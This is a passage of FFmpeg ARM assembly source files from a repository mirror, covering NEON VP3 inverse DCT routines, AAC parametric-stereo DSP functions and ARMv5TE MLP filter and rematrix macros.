vsub.s16 q12, q12, q15 // Ed = E - G
vsub.s16 q3, q8, q10 // Fd = F - Ad
vadd.s16 q10, q8, q10 // Add = F + Ad
vadd.s16 q4, q9, q14 // Hd = Bd + H
vsub.s16 q14, q9, q14 // Bdd = Bd - H
vadd.s16 q8, q2, q11 // [0] = Gd + Cd
vsub.s16 q15, q2, q11 // [7] = Gd - Cd
vadd.s16 q9, q10, q4 // [1] = Add + Hd
vsub.s16 q10, q10, q4 // [2] = Add - Hd
vadd.s16 q11, q12, q13 // [3] = Ed + Dd
vsub.s16 q12, q12, q13 // [4] = Ed - Dd
.ifc \type, row
vtrn.16 q8, q9
.endif
vadd.s16 q13, q3, q14 // [5] = Fd + Bdd
vsub.s16 q14, q3, q14 // [6] = Fd - Bdd
.ifc \type, row
// 8x8 transpose
vtrn.16 q10, q11
vtrn.16 q12, q13
vtrn.16 q14, q15
vtrn.32 q8, q10
vtrn.32 q9, q11
vtrn.32 q12, q14
vtrn.32 q13, q15
vswp d17, d24
vswp d19, d26
vadd.s16 q1, q8, q12
vswp d21, d28
vsub.s16 q8, q8, q12
vswp d23, d30
.endif
bx lr
endfunc
.endm
VP3_IDCT_END row
VP3_IDCT_END col
function ff_vp3_idct_put_neon, export=1
mov ip, lr
bl vp3_idct_start_neon
bl vp3_idct_end_row_neon
mov r3, #8
add r3, r3, #2048 // convert signed pixel to unsigned
bl vp3_idct_core_neon
bl vp3_idct_end_col_neon
mov lr, ip
vpop {d8-d15}
vqshrun.s16 d0, q8, #4
vqshrun.s16 d1, q9, #4
vqshrun.s16 d2, q10, #4
vqshrun.s16 d3, q11, #4
vst1.64 {d0}, [r0,:64], r1
vqshrun.s16 d4, q12, #4
vst1.64 {d1}, [r0,:64], r1
vqshrun.s16 d5, q13, #4
vst1.64 {d2}, [r0,:64], r1
vqshrun.s16 d6, q14, #4
vst1.64 {d3}, [r0,:64], r1
vqshrun.s16 d7, q15, #4
vst1.64 {d4}, [r0,:64], r1
vst1.64 {d5}, [r0,:64], r1
vst1.64 {d6}, [r0,:64], r1
vst1.64 {d7}, [r0,:64], r1
bx lr
endfunc
function ff_vp3_idct_add_neon, export=1
mov ip, lr
bl vp3_idct_start_neon
bl vp3_idct_end_row_neon
mov r3, #8
bl vp3_idct_core_neon
bl vp3_idct_end_col_neon
mov lr, ip
vpop {d8-d15}
mov r2, r0
vld1.64 {d0}, [r0,:64], r1
vshr.s16 q8, q8, #4
vld1.64 {d1}, [r0,:64], r1
vshr.s16 q9, q9, #4
vld1.64 {d2}, [r0,:64], r1
vaddw.u8 q8, q8, d0
vld1.64 {d3}, [r0,:64], r1
vaddw.u8 q9, q9, d1
vld1.64 {d4}, [r0,:64], r1
vshr.s16 q10, q10, #4
vld1.64 {d5}, [r0,:64], r1
vshr.s16 q11, q11, #4
vld1.64 {d6}, [r0,:64], r1
vqmovun.s16 d0, q8
vld1.64 {d7}, [r0,:64], r1
vqmovun.s16 d1, q9
vaddw.u8 q10, q10, d2
vaddw.u8 q11, q11, d3
vshr.s16 q12, q12, #4
vshr.s16 q13, q13, #4
vqmovun.s16 d2, q10
vqmovun.s16 d3, q11
vaddw.u8 q12, q12, d4
vaddw.u8 q13, q13, d5
vshr.s16 q14, q14, #4
vshr.s16 q15, q15, #4
vst1.64 {d0}, [r2,:64], r1
vqmovun.s16 d4, q12
vst1.64 {d1}, [r2,:64], r1
vqmovun.s16 d5, q13
vst1.64 {d2}, [r2,:64], r1
vaddw.u8 q14, q14, d6
vst1.64 {d3}, [r2,:64], r1
vaddw.u8 q15, q15, d7
vst1.64 {d4}, [r2,:64], r1
vqmovun.s16 d6, q14
vst1.64 {d5}, [r2,:64], r1
vqmovun.s16 d7, q15
vst1.64 {d6}, [r2,:64], r1
vst1.64 {d7}, [r2,:64], r1
bx lr
endfunc
function ff_vp3_idct_dc_add_neon, export=1
ldrsh r12, [r2]
mov r3, r0
add r12, r12, #15
vdup.16 q15, r12
mov r12, #0
strh r12, [r2]
vshr.s16 q15, q15, #5
vld1.8 {d0}, [r0,:64], r1
vld1.8 {d1}, [r0,:64], r1
vld1.8 {d2}, [r0,:64], r1
vaddw.u8 q8, q15, d0
vld1.8 {d3}, [r0,:64], r1
vaddw.u8 q9, q15, d1
vld1.8 {d4}, [r0,:64], r1
vaddw.u8 q10, q15, d2
vld1.8 {d5}, [r0,:64], r1
vaddw.u8 q11, q15, d3
vld1.8 {d6}, [r0,:64], r1
vaddw.u8 q12, q15, d4
vld1.8 {d7}, [r0,:64], r1
vaddw.u8 q13, q15, d5
vqmovun.s16 d0, q8
vaddw.u8 q14, q15, d6
vqmovun.s16 d1, q9
vaddw.u8 q15, q15, d7
vqmovun.s16 d2, q10
vst1.8 {d0}, [r3,:64], r1
vqmovun.s16 d3, q11
vst1.8 {d1}, [r3,:64], r1
vqmovun.s16 d4, q12
vst1.8 {d2}, [r3,:64], r1
vqmovun.s16 d5, q13
vst1.8 {d3}, [r3,:64], r1
vqmovun.s16 d6, q14
vst1.8 {d4}, [r3,:64], r1
vqmovun.s16 d7, q15
vst1.8 {d5}, [r3,:64], r1
vst1.8 {d6}, [r3,:64], r1
vst1.8 {d7}, [r3,:64], r1
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 9,927
|
ffmpeg-3.0.2/libavcodec/arm/aacpsdsp_neon.S
|
/*
* Copyright (c) 2012 Mans Rullgard
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
function ff_ps_add_squares_neon, export=1
mov r3, r0
sub r2, r2, #4
vld1.32 {q0}, [r1,:128]!
vmul.f32 q0, q0, q0
vld1.32 {q2}, [r1,:128]!
vmul.f32 q2, q2, q2
vld1.32 {q1}, [r0,:128]!
1:
vpadd.f32 d6, d0, d1
vld1.32 {q0}, [r1,:128]!
vpadd.f32 d7, d4, d5
vmul.f32 q0, q0, q0
vld1.32 {q2}, [r1,:128]!
vadd.f32 q3, q1, q3
vld1.32 {q1}, [r0,:128]!
vmul.f32 q2, q2, q2
vst1.32 {q3}, [r3,:128]!
subs r2, r2, #4
bgt 1b
vpadd.f32 d6, d0, d1
vpadd.f32 d7, d4, d5
vadd.f32 q1, q1, q3
vst1.32 {q1}, [r3,:128]!
bx lr
endfunc
function ff_ps_mul_pair_single_neon, export=1
sub r3, r3, #4
tst r1, #8
bne 2f
vld1.32 {q0}, [r1,:128]!
1:
vld1.32 {q3}, [r2,:128]!
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {q1}, [r1,:128]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d3, d7[1]
vld1.32 {q0}, [r1,:128]!
vst1.32 {q2,q3}, [r0,:128]!
subs r3, r3, #4
bgt 1b
vld1.32 {q3}, [r2,:128]!
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {q1}, [r1,:128]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d3, d7[1]
vst1.32 {q2,q3}, [r0,:128]!
bx lr
2:
vld1.32 {d0}, [r1,:64]!
vld1.32 {d1,d2}, [r1,:128]!
1:
vld1.32 {q3}, [r2,:128]!
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {d0,d1}, [r1,:128]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d0, d7[1]
vmov d0, d1
vld1.32 {d1,d2}, [r1,:128]!
vst1.32 {q2,q3}, [r0,:128]!
subs r3, r3, #4
bgt 1b
vld1.32 {q3}, [r2,:128]!
vmul.f32 d4, d0, d6[0]
vmul.f32 d5, d1, d6[1]
vld1.32 {d0}, [r1,:64]!
vmul.f32 d6, d2, d7[0]
vmul.f32 d7, d0, d7[1]
vst1.32 {q2,q3}, [r0,:128]!
bx lr
endfunc
function ff_ps_hybrid_synthesis_deint_neon, export=1
push {r4-r8,lr}
add r0, r0, r2, lsl #2
add r1, r1, r2, lsl #5+1+2
rsb r2, r2, #64
mov r5, #64*4
mov lr, r0
add r4, r0, #38*64*4
mov r12, r3
2:
vld1.32 {d0,d1}, [r1,:128]!
vst1.32 {d0[0]}, [lr,:32], r5
vst1.32 {d0[1]}, [r4,:32], r5
vst1.32 {d1[0]}, [lr,:32], r5
vst1.32 {d1[1]}, [r4,:32], r5
subs r12, r12, #2
bgt 2b
add r0, r0, #4
sub r2, r2, #1
tst r2, #2
bne 6f
1:
mov lr, r0
add r4, r0, #38*64*4
add r6, r1, # 32*2*4
add r7, r1, #2*32*2*4
add r8, r1, #3*32*2*4
mov r12, r3
2:
vld1.32 {d0,d1}, [r1,:128]!
vld1.32 {d2,d3}, [r6,:128]!
vld1.32 {d4,d5}, [r7,:128]!
vld1.32 {d6,d7}, [r8,:128]!
vst4.32 {d0[0],d2[0],d4[0],d6[0]}, [lr,:128], r5
vst4.32 {d0[1],d2[1],d4[1],d6[1]}, [r4,:128], r5
vst4.32 {d1[0],d3[0],d5[0],d7[0]}, [lr,:128], r5
vst4.32 {d1[1],d3[1],d5[1],d7[1]}, [r4,:128], r5
subs r12, r12, #2
bgt 2b
add r0, r0, #16
add r1, r1, #3*32*2*4
subs r2, r2, #4
bgt 1b
pop {r4-r8,pc}
6:
mov lr, r0
add r4, r0, #38*64*4
add r6, r1, #32*2*4
mov r12, r3
2:
vld1.32 {d0,d1}, [r1,:128]!
vld1.32 {d2,d3}, [r6,:128]!
vst2.32 {d0[0],d2[0]}, [lr,:64], r5
vst2.32 {d0[1],d2[1]}, [r4,:64], r5
vst2.32 {d1[0],d3[0]}, [lr,:64], r5
vst2.32 {d1[1],d3[1]}, [r4,:64], r5
subs r12, r12, #2
bgt 2b
add r0, r0, #8
add r1, r1, #32*2*4
sub r2, r2, #2
b 1b
endfunc
function ff_ps_hybrid_analysis_neon, export=1
vldm r1, {d19-d31}
ldr r12, [sp]
lsl r3, r3, #3
vadd.f32 d16, d19, d31
vadd.f32 d17, d20, d30
vsub.f32 d18, d19, d31
vsub.f32 d19, d20, d30
vsub.f32 d0, d21, d29
vsub.f32 d1, d22, d28
vadd.f32 d2, d21, d29
vadd.f32 d3, d22, d28
vadd.f32 d20, d23, d27
vadd.f32 d21, d24, d26
vsub.f32 d22, d23, d27
vsub.f32 d23, d24, d26
vmov.i32 d6, #1<<31
vmov.i32 d7, #0
vmov.f32 q14, #0.0
vmov.f32 q15, #0.0
vtrn.32 d6, d7
vrev64.32 q9, q9
vrev64.32 q0, q0
vrev64.32 q11, q11
veor q9, q9, q3
veor q0, q0, q3
veor q11, q11, q3
vld1.32 {q13}, [r2,:128]!
vtrn.32 q8, q9
vtrn.32 q1, q0
vtrn.32 q10, q11
sub r12, r12, #1
vmla.f32 q14, q8, q13
vld1.32 {q2}, [r2,:128]!
vmla.f32 q15, q9, q13
1:
vmla.f32 q14, q1, q2
vld1.32 {q13}, [r2,:128]!
vmla.f32 q15, q0, q2
vmla.f32 q14, q10, q13
vld1.32 {q2}, [r2,:128]!
vmla.f32 q15, q11, q13
vld1.32 {q13}, [r2,:128]!
vadd.f32 d6, d28, d29
vadd.f32 d7, d30, d31
vmov.f32 q14, #0.0
vmov.f32 q15, #0.0
vmla.f32 q14, q8, q13
vpadd.f32 d6, d6, d7
vmla.f32 q15, q9, q13
vmla.f32 d6, d25, d4[0]
vld1.32 {q2}, [r2,:128]!
vst1.32 {d6}, [r0,:64], r3
subs r12, r12, #1
bgt 1b
vmla.f32 q14, q1, q2
vld1.32 {q13}, [r2,:128]!
vmla.f32 q15, q0, q2
vmla.f32 q14, q10, q13
vld1.32 {q2}, [r2,:128]!
vmla.f32 q15, q11, q13
vadd.f32 d6, d28, d29
vadd.f32 d7, d30, d31
vpadd.f32 d6, d6, d7
vmla.f32 d6, d25, d4[0]
vst1.32 {d6}, [r0,:64], r3
bx lr
endfunc
function ff_ps_stereo_interpolate_neon, export=1
vld1.32 {q0}, [r2]
vld1.32 {q14}, [r3]
vadd.f32 q15, q14, q14
mov r2, r0
mov r3, r1
ldr r12, [sp]
vadd.f32 q1, q0, q14
vadd.f32 q0, q0, q15
vld1.32 {q2}, [r0,:64]!
vld1.32 {q3}, [r1,:64]!
subs r12, r12, #1
beq 2f
1:
vmul.f32 d16, d4, d2[0]
vmul.f32 d17, d5, d0[0]
vmul.f32 d18, d4, d2[1]
vmul.f32 d19, d5, d0[1]
vmla.f32 d16, d6, d3[0]
vmla.f32 d17, d7, d1[0]
vmla.f32 d18, d6, d3[1]
vmla.f32 d19, d7, d1[1]
vadd.f32 q1, q1, q15
vadd.f32 q0, q0, q15
vld1.32 {q2}, [r0,:64]!
vld1.32 {q3}, [r1,:64]!
vst1.32 {q8}, [r2,:64]!
vst1.32 {q9}, [r3,:64]!
subs r12, r12, #2
bgt 1b
it lt
bxlt lr
2:
vmul.f32 d16, d4, d2[0]
vmul.f32 d18, d4, d2[1]
vmla.f32 d16, d6, d3[0]
vmla.f32 d18, d6, d3[1]
vst1.32 {d16}, [r2,:64]!
vst1.32 {d18}, [r3,:64]!
bx lr
endfunc
|
Akagi201/ffmpeg-xcode
| 19,773
|
ffmpeg-3.0.2/libavcodec/arm/mlpdsp_armv5te.S
|
/*
* Copyright (c) 2014 RISC OS Open Ltd
* Author: Ben Avison <bavison@riscosopen.org>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#define MAX_CHANNELS 8
#define MAX_FIR_ORDER 8
#define MAX_IIR_ORDER 4
#define MAX_RATEFACTOR 4
#define MAX_BLOCKSIZE (40 * MAX_RATEFACTOR)
PST .req a1
PCO .req a2
AC0 .req a3
AC1 .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
ST0 .req v5
ST1 .req v6
ST2 .req sl
ST3 .req fp
I .req ip
PSAMP .req lr
.macro branch_pic_label first, remainder:vararg
A .word \first - 4
T .hword (\first) / 2
.ifnb \remainder
branch_pic_label \remainder
.endif
.endm
// Some macros that do loads/multiplies where the register number is determined
// from an assembly-time expression. Boy is GNU assembler's syntax ugly...
.macro load group, index, base, offset
.altmacro
load_ \group, %(\index), \base, \offset
.noaltmacro
.endm
.macro load_ group, index, base, offset
ldr \group\index, [\base, #\offset]
.endm
.macro loadd group, index, base, offset
.altmacro
loadd_ \group, %(\index), %(\index+1), \base, \offset
.noaltmacro
.endm
.macro loadd_ group, index0, index1, base, offset
A .if \offset >= 256
A ldr \group\index0, [\base, #\offset]
A ldr \group\index1, [\base, #(\offset) + 4]
A .else
ldrd \group\index0, \group\index1, [\base, #\offset]
A .endif
.endm
.macro multiply index, accumulate, long
.altmacro
multiply_ %(\index), \accumulate, \long
.noaltmacro
.endm
.macro multiply_ index, accumulate, long
.if \long
.if \accumulate
smlal AC0, AC1, CO\index, ST\index
.else
smull AC0, AC1, CO\index, ST\index
.endif
.else
.if \accumulate
mla AC0, CO\index, ST\index, AC0
.else
mul AC0, CO\index, ST\index
.endif
.endif
.endm
// A macro to update the load register number and load offsets
.macro inc howmany
.set LOAD_REG, (LOAD_REG + \howmany) & 3
.set OFFSET_CO, OFFSET_CO + 4 * \howmany
.set OFFSET_ST, OFFSET_ST + 4 * \howmany
.if FIR_REMAIN > 0
.set FIR_REMAIN, FIR_REMAIN - \howmany
.if FIR_REMAIN == 0
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.endif
.elseif IIR_REMAIN > 0
.set IIR_REMAIN, IIR_REMAIN - \howmany
.endif
.endm
// Macro to implement the inner loop for one specific combination of parameters
.macro implement_filter mask_minus1, shift_0, shift_8, iir_taps, fir_taps
.set TOTAL_TAPS, \iir_taps + \fir_taps
// Deal with register allocation...
.set DEFINED_SHIFT, 0
.set DEFINED_MASK, 0
.set SHUFFLE_SHIFT, 0
.set SHUFFLE_MASK, 0
.set SPILL_SHIFT, 0
.set SPILL_MASK, 0
.if TOTAL_TAPS == 0
// Little register pressure in this case - just keep MASK where it was
.if !\mask_minus1
MASK .req ST1
.set DEFINED_MASK, 1
.endif
.else
.if \shift_0
.if !\mask_minus1
// AC1 is unused with shift 0
MASK .req AC1
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif \shift_8
.if !\mask_minus1
.if TOTAL_TAPS <= 4
// All coefficients are preloaded (so pointer not needed)
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.else
.set SPILL_MASK, 1
.endif
.endif
.else // shift not 0 or 8
.if TOTAL_TAPS <= 3
// All coefficients are preloaded, and at least one CO register is unused
.if \fir_taps & 1
SHIFT .req CO0
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.else
SHIFT .req CO3
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.endif
.if !\mask_minus1
MASK .req PCO
.set DEFINED_MASK, 1
.set SHUFFLE_MASK, 1
.endif
.elseif TOTAL_TAPS == 4
// All coefficients are preloaded
SHIFT .req PCO
.set DEFINED_SHIFT, 1
.set SHUFFLE_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.else
.set SPILL_SHIFT, 1
.if !\mask_minus1
.set SPILL_MASK, 1
.endif
.endif
.endif
.endif
.if SPILL_SHIFT
SHIFT .req ST0
.set DEFINED_SHIFT, 1
.endif
.if SPILL_MASK
MASK .req ST1
.set DEFINED_MASK, 1
.endif
// Preload coefficients if possible
.if TOTAL_TAPS <= 4
.set OFFSET_CO, 0
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.rept \fir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.rept \iir_taps
load CO, LOAD_REG, PCO, OFFSET_CO
.set LOAD_REG, (LOAD_REG + 1) & 3
.set OFFSET_CO, OFFSET_CO + 4
.endr
.endif
// Move mask/shift to final positions if necessary
// Need to do this after preloading, because in some cases we
// reuse the coefficient pointer register
.if SHUFFLE_SHIFT
mov SHIFT, ST0
.endif
.if SHUFFLE_MASK
mov MASK, ST1
.endif
// Begin loop
01:
.if TOTAL_TAPS == 0
// Things simplify a lot in this case
// In fact this could be pipelined further if it's worth it...
ldr ST0, [PSAMP]
subs I, I, #1
.if !\mask_minus1
and ST0, ST0, MASK
.endif
str ST0, [PST, #-4]!
str ST0, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)]
str ST0, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.else
.if \fir_taps & 1
.set LOAD_REG, 1
.else
.set LOAD_REG, 0
.endif
.set LOAD_BANK, 0
.set FIR_REMAIN, \fir_taps
.set IIR_REMAIN, \iir_taps
.if FIR_REMAIN == 0 // only IIR terms
.set OFFSET_CO, 4 * MAX_FIR_ORDER
.set OFFSET_ST, 4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)
.else
.set OFFSET_CO, 0
.set OFFSET_ST, 0
.endif
.set MUL_REG, LOAD_REG
.set COUNTER, 0
.rept TOTAL_TAPS + 2
// Do load(s)
.if FIR_REMAIN != 0 || IIR_REMAIN != 0
.if COUNTER == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif COUNTER == 1 && (\fir_taps & 1) == 0
.if TOTAL_TAPS > 4
load CO, LOAD_REG, PCO, OFFSET_CO
.endif
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.elseif LOAD_BANK == 0
.if TOTAL_TAPS > 4
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load CO, LOAD_REG, PCO, OFFSET_CO
.else
loadd CO, LOAD_REG, PCO, OFFSET_CO
.endif
.endif
.set LOAD_BANK, 1
.else
.if FIR_REMAIN == 0 && IIR_REMAIN == 1
load ST, LOAD_REG, PST, OFFSET_ST
inc 1
.else
loadd ST, LOAD_REG, PST, OFFSET_ST
inc 2
.endif
.set LOAD_BANK, 0
.endif
.endif
// Do interleaved multiplies, slightly delayed
.if COUNTER >= 2
multiply MUL_REG, COUNTER > 2, !\shift_0
.set MUL_REG, (MUL_REG + 1) & 3
.endif
.set COUNTER, COUNTER + 1
.endr
// Post-process the result of the multiplies
.if SPILL_SHIFT
ldr SHIFT, [sp, #9*4 + 0*4]
.endif
.if SPILL_MASK
ldr MASK, [sp, #9*4 + 1*4]
.endif
ldr ST2, [PSAMP]
subs I, I, #1
.if \shift_8
mov AC0, AC0, lsr #8
orr AC0, AC0, AC1, lsl #24
.elseif !\shift_0
rsb ST3, SHIFT, #32
mov AC0, AC0, lsr SHIFT
A orr AC0, AC0, AC1, lsl ST3
T mov AC1, AC1, lsl ST3
T orr AC0, AC0, AC1
.endif
.if \mask_minus1
add ST3, ST2, AC0
.else
add ST2, ST2, AC0
and ST3, ST2, MASK
sub ST2, ST3, AC0
.endif
str ST3, [PST, #-4]!
str ST2, [PST, #4 * (MAX_BLOCKSIZE + MAX_FIR_ORDER)]
str ST3, [PSAMP], #4 * MAX_CHANNELS
bne 01b
.endif
b 99f
.if DEFINED_SHIFT
.unreq SHIFT
.endif
.if DEFINED_MASK
.unreq MASK
.endif
.endm
.macro switch_on_fir_taps mask_minus1, shift_0, shift_8, iir_taps
A ldr CO0, [pc, a3, lsl #2] // firorder is in range 0-(8-iir_taps)
A add pc, pc, CO0
T tbh [pc, a3, lsl #1]
0:
branch_pic_label (70f - 0b), (71f - 0b), (72f - 0b), (73f - 0b)
branch_pic_label (74f - 0b)
.if \iir_taps <= 3
branch_pic_label (75f - 0b)
.if \iir_taps <= 2
branch_pic_label (76f - 0b)
.if \iir_taps <= 1
branch_pic_label (77f - 0b)
.if \iir_taps == 0
branch_pic_label (78f - 0b)
.endif
.endif
.endif
.endif
70: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 0
71: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 1
72: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 2
73: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 3
74: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 4
.if \iir_taps <= 3
75: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 5
.if \iir_taps <= 2
76: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 6
.if \iir_taps <= 1
77: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 7
.if \iir_taps == 0
78: implement_filter \mask_minus1, \shift_0, \shift_8, \iir_taps, 8
.endif
.endif
.endif
.endif
.endm
.macro switch_on_iir_taps mask_minus1, shift_0, shift_8
A ldr CO0, [pc, a4, lsl #2] // irorder is in range 0-4
A add pc, pc, CO0
T tbh [pc, a4, lsl #1]
0:
branch_pic_label (60f - 0b), (61f - 0b), (62f - 0b), (63f - 0b)
branch_pic_label (64f - 0b)
60: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 0
61: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 1
62: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 2
63: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 3
64: switch_on_fir_taps \mask_minus1, \shift_0, \shift_8, 4
.endm
/* void ff_mlp_filter_channel_arm(int32_t *state, const int32_t *coeff,
* int firorder, int iirorder,
* unsigned int filter_shift, int32_t mask,
* int blocksize, int32_t *sample_buffer);
*/
function ff_mlp_filter_channel_arm, export=1
push {v1-fp,lr}
add v1, sp, #9*4 // point at arguments on stack
ldm v1, {ST0,ST1,I,PSAMP}
cmp ST1, #-1
bne 30f
movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 20f
bcs 10f
switch_on_iir_taps 1, 1, 0
10: switch_on_iir_taps 1, 0, 1
20: switch_on_iir_taps 1, 0, 0
30: movs ST2, ST0, lsl #29 // shift is in range 0-15; we want to special-case 0 and 8
bne 50f
bcs 40f
switch_on_iir_taps 0, 1, 0
40: switch_on_iir_taps 0, 0, 1
50: switch_on_iir_taps 0, 0, 0
99: pop {v1-fp,pc}
endfunc
.unreq PST
.unreq PCO
.unreq AC0
.unreq AC1
.unreq CO0
.unreq CO1
.unreq CO2
.unreq CO3
.unreq ST0
.unreq ST1
.unreq ST2
.unreq ST3
.unreq I
.unreq PSAMP
/********************************************************************/
PSA .req a1 // samples
PCO .req a2 // coeffs
PBL .req a3 // bypassed_lsbs
INDEX .req a4
CO0 .req v1
CO1 .req v2
CO2 .req v3
CO3 .req v4
SA0 .req v5
SA1 .req v6
SA2 .req sl
SA3 .req fp
AC0 .req ip
AC1 .req lr
NOISE .req SA0
LSB .req SA1
DCH .req SA2 // dest_ch
MASK .req SA3
// INDEX is used as follows:
// bits 0..6 index2 (values up to 17, but wider so that we can
// add to index field without needing to mask)
// bits 7..14 i (values up to 160)
// bit 15 underflow detect for i
// bits 25..31 (if access_unit_size_pow2 == 128) \ index
// bits 26..31 (if access_unit_size_pow2 == 64) /
.macro implement_rematrix shift, index_mask, mask_minus1, maxchan
.if \maxchan == 1
// We can just leave the coefficients in registers in this case
ldrd CO0, CO1, [PCO]
.endif
1:
.if \maxchan == 1
ldrd SA0, SA1, [PSA]
smull AC0, AC1, CO0, SA0
.elseif \maxchan == 5
ldr CO0, [PCO, #0]
ldr SA0, [PSA, #0]
ldr CO1, [PCO, #4]
ldr SA1, [PSA, #4]
ldrd CO2, CO3, [PCO, #8]
smull AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #8]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #16]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #16]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.else // \maxchan == 7
ldr CO2, [PCO, #0]
ldr SA2, [PSA, #0]
ldr CO3, [PCO, #4]
ldr SA3, [PSA, #4]
ldrd CO0, CO1, [PCO, #8]
smull AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #8]
smlal AC0, AC1, CO3, SA3
ldrd CO2, CO3, [PCO, #16]
smlal AC0, AC1, CO0, SA0
ldrd SA2, SA3, [PSA, #16]
smlal AC0, AC1, CO1, SA1
ldrd CO0, CO1, [PCO, #24]
smlal AC0, AC1, CO2, SA2
ldrd SA0, SA1, [PSA, #24]
smlal AC0, AC1, CO3, SA3
smlal AC0, AC1, CO0, SA0
.endif
ldm sp, {NOISE, DCH, MASK}
smlal AC0, AC1, CO1, SA1
.if \shift != 0
.if \index_mask == 63
add NOISE, NOISE, INDEX, lsr #32-6
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-6
.else // \index_mask == 127
add NOISE, NOISE, INDEX, lsr #32-7
ldrb LSB, [PBL], #MAX_CHANNELS
ldrsb NOISE, [NOISE]
add INDEX, INDEX, INDEX, lsl #32-7
.endif
sub INDEX, INDEX, #1<<7
adds AC0, AC0, NOISE, lsl #\shift + 7
adc AC1, AC1, NOISE, asr #31
.else
ldrb LSB, [PBL], #MAX_CHANNELS
sub INDEX, INDEX, #1<<7
.endif
add PSA, PSA, #MAX_CHANNELS*4
mov AC0, AC0, lsr #14
orr AC0, AC0, AC1, lsl #18
.if !\mask_minus1
and AC0, AC0, MASK
.endif
add AC0, AC0, LSB
tst INDEX, #1<<15
str AC0, [PSA, DCH, lsl #2] // DCH is precompensated for the early increment of PSA
beq 1b
b 98f
.endm
.macro switch_on_maxchan shift, index_mask, mask_minus1
cmp v4, #5
blo 51f
beq 50f
implement_rematrix \shift, \index_mask, \mask_minus1, 7
50: implement_rematrix \shift, \index_mask, \mask_minus1, 5
51: implement_rematrix \shift, \index_mask, \mask_minus1, 1
.endm
.macro switch_on_mask shift, index_mask
cmp sl, #-1
bne 40f
switch_on_maxchan \shift, \index_mask, 1
40: switch_on_maxchan \shift, \index_mask, 0
.endm
.macro switch_on_au_size shift
.if \shift == 0
switch_on_mask \shift, undefined
.else
teq v6, #64
bne 30f
orr INDEX, INDEX, v1, lsl #32-6
switch_on_mask \shift, 63
30: orr INDEX, INDEX, v1, lsl #32-7
switch_on_mask \shift, 127
.endif
.endm
/* void ff_mlp_rematrix_channel_arm(int32_t *samples,
* const int32_t *coeffs,
* const uint8_t *bypassed_lsbs,
* const int8_t *noise_buffer,
* int index,
* unsigned int dest_ch,
* uint16_t blockpos,
* unsigned int maxchan,
* int matrix_noise_shift,
* int access_unit_size_pow2,
* int32_t mask);
*/
